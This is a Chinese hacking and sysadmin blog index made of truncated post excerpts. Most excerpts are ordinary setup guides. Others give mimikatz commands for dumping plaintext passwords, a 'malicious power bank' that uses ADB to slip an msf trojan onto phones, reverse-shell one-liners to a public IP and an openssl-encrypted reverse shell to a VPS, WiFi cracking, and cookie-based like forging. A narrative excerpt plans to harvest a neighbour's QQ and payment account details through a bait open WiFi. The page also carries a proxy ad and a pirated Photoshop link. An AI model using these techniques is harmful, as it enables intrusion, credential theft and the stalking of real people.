建站VPS工具综合杂谈

之前，家中的路由器用的是小米的，用着用着感觉小米的路由器很是一般。打算入手华硕，由于自己平时不打游戏，所以没有买游戏路由器，感觉AC2200还可以，于是便入手了！ 开箱视频 刷梅林固件我在梅林的下载页看了看，但是很遗憾，并没有AC2200的梅林固件。很是失落，但是通过查阅相关资料，发现AC2200和ACRH17的参数一样，并且两者的官方固件也是一样的。于是找到了ACRH17的梅林固件。并成功刷入成功。 1：点击系统设置-升级固件-选择固件 2：点击升级 3：完成升级 重启 4：原来的界面 显而易见，梅林固件的精彩之处在于，尽量保证原官方固件不变的情况下，加入了软件中心，我们可以安装各种插件。 官方固件搭建FRPRT-AC2200是基于amd的固件，很简单，我们以0.38为例，只需要配置下面几条命令即可。 cd /home #下载 wget --no-check-certificate https://bbskali.cn/frp_0.38.0_linux_arm.tar.gz #解压 tar -xzvf frp_0.38.0_linux_arm.tar.gz #文件夹名改成 frp，不然目录太长了不方便 mv frp_0.38.0_linux_arm frp cd frp #确保 frps 程序具有可执行权限 chmod +x frps配置客户端因为服务端我已经配置好了，具体配置可以查看我之前的文章。 [common] server_addr = 127.0.0.1 #服务器IP地址 server_port = 7000 #frp…

给主题添加自定义样式:将以下代码添加到主题的自定义CSS里(Handsome主题在:控制台--外观--设置外观--开发者设置--自定义CSS,复制到框中即可,其他主题找到合适的位置放置) /*视频挂载*/ .iframe_video { position: relative; width: 100%; } @media only screen and (max-width: 767px) { .iframe_video { height: 15em; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .iframe_video { height: 20em; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .iframe_video { height: 30em; } } @media only screen and (min-width: 1200px) { .iframe_video { height: 40em; } } .iframe_cross { position: relative; width: 100%; height: 0; padding-bot…

关于mimikatzmimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器，它具备很多功能，其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此，它还可以提升进程权限，注入进程，读取进程内存等等，mimikatz包含了很多本地模块，更像是一个轻量级的调试器。项目地址https://github.com/gentilkiwi/mimikatz/releases/latest https://github.com/gentilkiwi/mimikatz实验环境Windows 7Kali Linux使用运行mimikatz.exe 需要用管理员权限运行 分别输入下面命令 privilege::debug sekurlsa::logonpasswords然后下来我们可以看到已经获取到明文密码了 怎么样，很简单吧！ 当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码 但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future. 意思是在高版本中启用了mimikatz改用了kiwi。 好吧，既然提高了kiwi我们来看看kiwi怎么用 关于kiwimeterpreter > help kiwi #查看帮助 Kiwi Commands ====…

下载并解压wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz tar xvf mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz mv mysql-8.0.26-linux-glibc2.12-x86_64 mysql 进入 /USR/LOCAL 目录下，创建用户和用户组并授权 cd /usr/local/ groupadd mysql useradd -r -g mysql mysql cd mysql/ #注意：进入mysql文件下授权所有的文件 chown -R mysql:mysql ./ 修改/USR/LOCAL/MYSQL当前目录的用户 chown -R root:root ./ #注意：一定要进入 /usr/local/mysql 目录下 chown -R mysql:mysql data初始化数据库bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data记录初始密码 配置my.cnf其中 my.cnf 配置的内容为： [mysqld] character_set_server=utf8mb4 basedir=/usr/local/mysql datadir=/usr/local/mysql/data log-er…

安装安装方法（phpstudy for linux V0.2公测版） 使用 SSH 连接工具 连接到您的 Linux服务器后，根据系统执行相应命令开始安装（大约2分钟完成面板安装）： Centos安装脚本 yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh Ubuntu安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Deepin安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Debian安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh 安装成功后如下： 访问登录后台登录界面简而朴实 防火墙报表 还是很漂亮的。 防火墙配置

本教程纯属虚构，里面涉及到的思路仅供吹牛。请勿非法使用，造成法律后果请自负！ 什么是恶意充电宝 准备树莓派（虚拟机下没有尝试，因为需要安装手机的驱动。理论上应该也是可以的。）充电宝外壳（有条件的可以尝试利用3D打印，自己做一个外壳。） -数据线 安装ADB在树莓派中执行 apt-get install adb如果失败，请更新你的源为国内阿里云或中科大的源。 验证在终端中输入 adb如下，则证明安装完成。 配置手机在设置中开启 开发者选项—USB试调即可。 开始测试将手机和树莓派用数据线连接 这里提示是在充电，我们来看看在不知不觉中我们是如何进入手机的。 终端执行 adb devices 其中 34fb90f30704 device就是我们刚才连接的手机。 比如这时想指定 34fb90f30704 这个设备来运行 adb 命令获取屏幕分辨率： adb -s 34fb90f30704 shell wm size 显示手机中的所有应用adb shell pm list packages 其他命令参见列表 安装apk利用这个功能，我们可以把msf木马安装到我们的目标手机，方便我们测试！ 命令格式： adb install [-lrtsdg] <path_to_apk>参数： adb install 后面可以跟一些可选参数来控制安装 APK 的行为，可用参数及含义如下： 如：adb install -g /root/11.apk 效果如下： 文件管理复制设备里的文件到电脑命令： adb pull <设备里的文件路…

在我们看来，Linux就是全命令行。需要记录很多的命令来实现某个功能。正是这样，也让学习Linux有了一定的门槛。但是你知道吗？Linux中也有很多的有趣命令，当然所有Linux发行版都可以安装运行这些命令！一起来玩耍吧！ sl 命令你会看到一辆火车从屏幕右边开往左边。。。。。。 安装 sudo apt-get install sl 运行 sl 命令有 -alFe几个选项， -a An accident seems to happen. You’ll feel pity for people who cry for help. -l shows little one. -F It flies. -e Allow interrupt by Ctrl+C.可以给别人来个恶作剧，他一敲ls，不知道的肯定很有效果 alias ls=slfortune 命令输出一句话，有笑话，名言什么的 (还有唐诗宋词sudo apt-get install fortune-zh) 安装 sudo apt-get install fortune运行 fortune cowsay 命令用ASCII字符打印牛，羊等动物，还有个cowthink，这个是奶牛想，那个是奶牛说，哈哈，差不多 安装 sudo apt-get install cowsay运行 cowsay "大表哥,牛逼666" cowsay -l查看其它动物的名字，然后-f跟上动物名，如 cowsay -f tux "坑爹啊" 还可以让cowsay说出fortune的内容，就像这样： fortune | co…

Mimipenguin beta-2.0A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. alt text DetailsThis version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments. 项目地址: 链接

XXE 是什么介绍 XXE 之前，我先来说一下普通的 XML 注入，这个的利用面比较狭窄，如果有的话应该也是逻辑漏洞 如图所示： 既然能插入 XML 代码，那我们肯定不能善罢甘休，我们需要更多，于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入，从名字就能看出来，这是一个注入漏洞，注入的是什么？XML外部实体。(看到这里肯定有人要说：你这不是在废话)，固然，其实我这里废话只是想强调我们的利用点是 外部实体 ，也是提醒读者将注意力集中于外部实体中，而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了)，如果能注入 外部实体并且成功解析的话，这就会大大拓宽我们 XML 注入的攻击面（这可能就是为什么单独说 而没有说 XML 注入的原因吧，或许普通的 XML 注入真的太鸡肋了，现实中几乎用不到） 相关背景XML是一种非常流行的标记语言，在1990年代后期首次标准化，并被无数的软件项目所采用。它用于配置文件，文档格式（如OOXML，ODF，PDF，RSS，...），图像格式（SVG，EXIF标题）和网络协议（WebDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，...），他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 XML 文档有自己的一个格式规范，这个格式规范是由一个叫做 DTD（document type definition） 的东西控制的，他就是长得下面这个样子 ?xml version="1.0"…

前言在平时我们玩耍的时候，都是在PC机或者在虚拟机上运行的。但是这样有一个缺陷，就是我们在外出的时候或者不方便用PC的时候没有设备让我们玩。同时不少小伙伴在玩msf中很头疼如何玩转外网的shell。除了以前说过的利用端口映射外，在看看如何用vps玩外网shell。 什么是vpsvps（Virtual Private Server 虚拟专用服务器）将一台服务器分割成多个虚拟专享服务器的优质服务。实现VPS的技术分为容器技术，和虚拟化技术 [1] 。在容器或虚拟机中，每个VPS都可分配独立公网IP地址、独立操作系统、实现不同VPS间磁盘空间、内存、CPU资源、进程和系统配置的隔离，为用户和应用程序模拟出“独占”使用计算资源的体验。 说了一大堆，就是一台云服务器 购买vps有钱就行 常见的vps主机商（阿里云 百度云 腾讯云 又拍云 七牛云等等）这里推荐vulter原因很简单…… 环境说明这里笔者购买了一台百度云的vps 系统为centos7 安装nmapyum install nmap当然你也可以参考官方的教程，安装nmap的最新版 测试 nmap -O bbskali.cn 安装sqlmap先安装Python yum install python -y如果已安装，请忽略。 安装sqlmap cd /usr/src git clone https://github.com/sqlmapproject/sqlmap.git]https://github.com/sqlmapproject/sqlmap.git cd sqlmap ./sq…

stacer是一款图形化的垃圾清理和系统管理工具。有进程管理、开机启动项管理、可视化软件安装和卸载。对于不熟悉Linux命令的小白而言是非常友好的。 安装apt-get install stacer多彩的仪表盘 可视化的垃圾扫描 进程管理 开机启动管理 可视化软件卸载 系统源管理 利用命令清理垃圾卸载软件apt-get remove <package-name> apt-get purge <package-name>remove将会删除软件包，但会保留配置文件．purge会将软件包以及配置文件都删除． 找出系统上哪些软件包留下了残余的配置文件 dpkg --list | grep "^rc" 其中第一栏的rc表示软件包已经删除（Remove），但配置文件（Config-file）还在. 现在提取这些软件包的名称． dpkg --list | grep "^rc" | cut -d " " -f 3删除这些软件包 dpkg --list | grep "^rc" | cut -d " " -f 3 | xargs sudo dpkg --purge如果你只想删除某个软件包的配置文件，那么可以使用下面的命令 sudo dpkg --purge <package-name>删除没有用的deb软件安装包sudo apt-get clean sudo apt-get autoclean删除孤立软件包有时候，你用apt-get安装一个软件包时会自动安装其他的依赖．当你删除掉这个软件包时，这些依赖也就没有用处了．这…

残灯几盏，夜色浓浓。我走在城市不知名的小路上，抱怨着上班带给我的种种压抑。看看羞涩的钱包，看看迷茫的前路……我陷入了沉思。今天又是加班的一天，新项目要上线但BUG层出不穷，只能加班到这个点了。这时有老婆的估计都睡了吧。 来到自己租的公寓楼下，我租的小公寓是两层的小楼，楼下住着房东，楼上共两间房。之前一间是大人陪读的，孩子毕业后也搬走了。二层有个小院，这是我租这里的原因。夏日坐在小院，抬头仰望星空，甚是美哉！ 刚上小楼，发现隔壁的灯亮着。这都这个点了，哪来的人呢？估计是新搬来的吧。也没在乎，累了一天直接睡了。 每天起床我是比较迟的，但是今天起床格外的早。因为我在梦中恰似听见了有女的说话。而且是那种很具有磁性的声音。对于我这种单身狗而言，可遇不可求！因我性格比较内向，也比较腼腆，至今也没女朋友。而我恰似看到了春天。 在上班的时候，碰到房东，顺便提到此事。从房东口中得知，原来是昨天刚搬来的，好像是在某行政单位上班。对我来说这是一个千载难逢的机会，而一个新的计划整天徘徊在我脑海中。 信息收集目标： 收集 QQ *宝 信 手*号 等相关信息。 抛砖引玉如何获取目标的以上信息呢？有的小伙伴说很简单吗？问问不就行了，可对于我们这种性格内向的人来说。这是一道无法跨越的坎。 那该如何做呢？如今虽是5G,但是昂贵的费用让打工人还是喜欢蹭WIFI。她刚搬来，第一件事就是看看有没有能用的WIFI。 如是我开启了路由器的访客网络，没有加密。目的是让其能快速上钩。但是有些因免费热点而有所顾虑。也可以设置为加密WiFi，然后通过WiFi万能钥匙分享密码。 乘间伺隙…

我们在网络上下载文件，有时常常会看到文件的作者会附加程序的md5值。其目的是让用户对下载的文件进行md5值对比。若你下载的文件的MD5值与原作者提供的不符，则说明文件被他人修改过。如果是程序，则有可能被他人加入了恶意后门。 计算机为任意数量的文件使用多个哈希或消息摘要。同时可以选择以递归方式挖掘目录结构。默认情况下，程序计算 MD5 和 SHA-256 哈希，等效于 -c md5，sha256。它还可以使用已知哈希列表来审核一组文件。错误将报告为标准错误。如果未指定任何文件，则从标准输入读取。 使用hashdeep 文件名 将文件修改后，再看md5值 可以发现，由b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239改变成为了02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69 其他参数-c ：模式。使用指定的算法计算文件的哈希。支持 md5、sha1、sha256、tiger 和 whirlpool。 -r ：启用递归模式。遍历所有子目录。请注意，递归模式不能用于检查给定文件扩展名的所有文件。例如，调用 hashdeep -r *.txt 将检查以.txt结尾的目录中的所有文件。 -v :启用详细模式。再次使用以使程序更详细。

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！ 為什麼選擇Smart proxies？ 海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP； 高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定； 高速連線－優質線路，低延遲，確保流暢體驗； 性價比高－彈性套餐，隨選購買，低成本高收益； 便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。 適用場景： 爬蟲資料收集，突破反爬限制 跨境電商，防關聯操作 遊戲加速，暢玩全球服 社媒行銷，多帳號管理 限時優惠活動 現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！ 官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理： 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____

1.查看内存使用查看在未增加swap之前虚拟内存的使用情况 free -m 2.创建 swap 文件使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 文件越大，创建的时间越厂 3.转换为 swap 格式将文件格式转换为 swap 格式的 mkswap /home/swap 4.挂载swap分区再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap 如果报错：swapon: /home/swap: insecure permissions 0644, 0600 suggested. 修改权限： chmod 600 /home/swap 5.再次查看内存使用注意观察和1中变化。 free -m 6.设置重启依然有效为防止重启后swap分区变成0，需要修改/etc/fstab文件： 在文件末尾（最后一行）加上 /home/swap swap swap default 0 07.停用虚拟内存swapoff -v /home/swap

java文件jar最大的特性 跨平台，但是比较麻烦的是需要我们安装java环境。对于专业人士来说很简单，但是对于其他的用户来说，就比较臃肿了。今天来聊聊如何将jar文件保存为exe文件。用到的软件eclipseexe4j 生成jar文件运行eclipse打开我们的项目。 选择项目--导出--jar文件 如图，去掉lib 和setting(config)前面的√以及classpath project前面的√设置保存的名称。 点击下一步设置main类点击完成即可！ 将jar生成exe运行exe4j选择jar in exe mode 新建一个文件夹，最好和项目同名。复制项目下的lib 和settings 以及我们生成的jar文件到该目录。 设置生成的的名字和刚才建立文件的位置 点击下一步，设置名称，图标，点击高级设置，设置兼容32和64位系统 添加我们的可运行jar文件，已经项目用到的库文件lib 设置版本 然后一路向下即可！

1为PHP-FPM及Nginx创建专门的用户groupadd www useradd -s /sbin/nologin www -g www -M-s参数是表示不允许登录，-g参数是分配到www组，-M表示不创建用户目录。 2 安装phpCentOS8自带了PHP7.2版本，相对来说比较新，暂时不需要借助第三方的源来安装，而且CentOS8自带的PHP的模块也相对来说够用，使用下面命令可以看到所有PHP相关的包： yum search php安装模块 yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc php-zip php-cli php-fpm php-gd php-mysqlnd php-mbstring php-opcache php-pdo php-json配置PHP-FPM安装好了之后，我们还需要稍稍配置一下PHP-FPM，以让其更好的与Nginx进行配合工作。 编辑/etc/php-fpm.d/www.conf 文件，这个文件有两个需要注意的地方，其中一个就是运行PHP-FPM的用户及对应的用户组： vim /etc/php-fpm.d/www.conf user = www group = www listen = /run/php-fpm/www.sock修改上述文件，将其中的user及group字段由apache更改成上述我们创建的www。 另外一个就是listen = /run/php-fpm…

环境说明公网服务器一台kali （内网） 简单的测试在公网服务器执行命令 nc -lvvp 4444kali中执行命令 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包，分析流量。 测试我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。 我们可以清楚的看到，终端流量是通过明文传送。那么如何保证安全呢，这需要我们对明文流量加密处理。 openssl加密传输第一步，在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步，在VPS监听反弹shell openssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步，在目标上用openssl加密反弹shell的流量 mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s 流量已经被加密。

对于WIFI破解，总的来说方法就是那么几种。也没什么特别的技术含量。这么多年了，还是停留在以前陈旧的抓包破解的过程。也没有新的攻击方式，但是相信随着信息技术的发展。越来越多的技术漏洞也会说着披露。 启动fern wifi cracker在kali的菜单中，找到无线攻击模块，里面就有fern wifi cracker 选择无线网卡并扫描网络选择你的无线网卡wlan如果没有，则说明你的网卡不支持。 然后点击第二个，骚等片刻即可出现要攻击的WiFi。 这里扫描需要等待会儿 设置字典位置，开始破解。 总结相对来说，破解还是很简单的。纯属傻瓜式一步到位！破解的成功率也是依靠字典，所以比款工具仅仅适合新手入门！

在本文中，我们将回顾一些最常用的 Linux 网络管理命令工具和程序。并对这些命令进行解释和说明，以便我们更好的掌握。 01 ifconfig命令ifconfig是一个用于网络接口配置的命令行接口工具。也用于在系统启动时初始化网卡接口，也可用于为接口分配 IP 地址并按需启用或禁用接口。它还用于查看当前活动接口的 IP地址、硬件MAC 地址以及 MTU（最大传输单元）大小。 示例ifconfig 要列出当前可用的所有接口，无论是up还是down，请后面加-a参数。 ifconfig -a 要将 IP 地址分配给接口，请使用以下命令。 ifconfig eth0 192.168.56.5 netmask 255.255.255.0激活网络接口。 ifconfig up wlan0要停用或关闭网络接口 ifconfig down wlan0注意： 虽然ifconfig是一个很棒的工具，但它现在已经过时（不推荐使用），它的替代品是下面解释的ip 命令。 02 IP命令ip 命令是另一个有用的命令行实用程序，用于显示和操作路由、网络设备、接口。它是ifconfig和许多其他网络命令的替代品。 示例ip addr show 将 IP 地址临时分配给特定网络接口 ( eth0 ) ip addr add 192.168.56.1 dev eth0要从网络接口 ( eth0 ) 中删除分配的 IP 地址 ip addr del 192.168.56.15/24 dev eth0显示内核中的当前邻居表 ip neigh 03 ifup、ifdown 和…

设备清单esp8266开发板oled显示器杜邦线 电路图 连线示意图 显示器连接 VCC----3V3(+) GND----GND(-) SCL----D1 SOA----D2 传感器示意图 VCC----3V3(+) GND----GND(-) OUT----D5 实物连接图安装库文件Installing the OLED libraries依次打开Sketch > Include Library > Manage Libraries 搜索SSD1306然后安装 搜索GFX安装 搜索DHT 搜索Adafruit Unified Sensor 实例代码/********* Rui Santos Complete project details at https://randomnerdtutorials.com *********/ #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> #include <Adafruit_Sensor.h> #include <DHT.h> #define SCREEN_WIDTH 128 // OLED display width, in pixels #define SCREEN_HEIGHT 64 // OLED display height, in pixels // Declaration for an …

现在无论是那种自媒体，都有点赞的功能。而一篇文章的赞越多相应的会得到相关的流量和推广。你知道关于赞是如何实现的吗？ 什么是COOKIECookie实际上是一小段的文本信息（key-value格式）。客户端向服务器发起请求，如果服务器需要记录该用户状态，就使用response向客户端浏览器颁发一个Cookie。客户端浏览器会把Cookie保存起来。当浏览器再请求该网站时，浏览器把请求的网址连同该Cookie一同提交给服务器。服务器检查该Cookie，以此来辨认用户状态。 举个例子，加入你的电话丢了。当你买个新手机后要去办卡。这是我们只拿着sfz去补办就行了。因为之前你办卡时，系统中已存放了你的相关的信息。无需录入新的信息！ 基于Cookie的点赞这里我已我的博客为例，如文章《树莓派4B搭建自己的FM电台》当前的点赞数为2赞。当我点赞后无法连续点赞。 而后，清楚浏览器缓存后。在尝试点赞。 可以发现，又能点赞了。这是什么原因呢？ 原来，当我们点击点赞按钮后，我们的浏览器会存在cookie数据。当我们再次点赞时，cookie数据已经存在了，故不能连续点赞。反之，当我们清除了浏览器存放的cookie数据，便可以再次点赞。那么？能不能不要每次都手动清除浏览器数据，而自动刷赞呢？ 分析数据包我们在burp中抓包，看看数据的请求是怎样的。 点击点赞按钮，抓取数据包。 可以看到，我们的cookie是编码的。右键Send to decode对编码解码 原数据 Cookie: __51uvsct__JJhdkR8L54ZwvuFw=13; __51vck…

typecho的seo优化，相对来说还是很不错的。但是我们的搜索引擎最喜欢爬取静态的页面，如hello.html而对于动态的页面效果肯定没有静态的好。typecho默认的网址路劲为https://xxx.com/index.php/archives/{cid}/本文教你怎样优化网址链接。 去掉index.php在网站根目录下新建文件.htaccess 写入内容如下： <IfModule mod_rewrite.c> Options +FollowSymLinks RewriteEngine on RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>保存后，登录网站后台，永久链接设置 启用地址从写功能，并自定义网站网址路劲/{cid}.html 解决404问题如果你的网站是新站，或者百度收录比较少的话，这样就可以了。但是笔者的网站上线时间比较长，百度收录的也比较多。那么问题来了，百度收录的地址是https://blog.bbskali.cn/index.php/archives/22/而我现在的新地址是https://blog.bbskali.cn/22.html如果从百度访问站点直接404 解决方案： 在博客主题404写入下面文件 <?php $error_url = '//'.$_SERV…

前期的准备树莓派4b16G U盘 读卡器kali2019.4镜像网线一根 老夫的树莓派 树莓派正面 组装树莓派需要注意树莓派风扇的连线，脚针如下图： 组装后的效果： 开始刷入系统在 https://www.offensive-security.com/kali-linux-arm-images/ 中，找到RaspberryPi Foundation，根据自己的需要下载镜像 插入内存卡，写入镜像。 点亮你的树莓派将写好的内存卡装载到树莓派中，插入电源！插入网线！由于我没有买屏幕（主要是贵）。我们用ssh连接树莓派。 登录路由器，查看树莓派的ip地址！ 打开Xshell连接树莓派。 需要注意的是： 主机名：kali的ip地址 用户名：root 密码：toor 如下：成功连接 配置vnc由于没有屏幕，我们可以按照vnc进行远程桌面。 apt-get install tightvncserver注意：kali2019.4是默认安装的 配置tightvncserver 在终端输入tightvncserver 会提示输入密码，我们输入我们的密码（需要注意的是，这个密码是vnc连接的密码。） 连接vnc主机名：ip:1 用户名：root 密码：刚才自己输入的密码 注意ip后面必须填写:1 下载vnc软件，进行连接。手机效果！ 启动命令为 vncserver :1 设置中文在命令行输入”dpkg-reconfigure locales”。 进入图形化界面之后，（空格是选择，Tab是切换，*是选中），选中en_US.UTF-8和zh_CN.U…

安装下载地址： 链接:https://pan.baidu.com/s/1ZeU_rOXgnvPY8PbqbJiuxw 提取码:sn57 默认安装 根据电脑情况等待片刻 点击关闭 需要注意的是，我们直接打开软件会出现闪退的情况。需要到Photoshop的安装目录运行Photoshop_Original绑定我们的账号即可。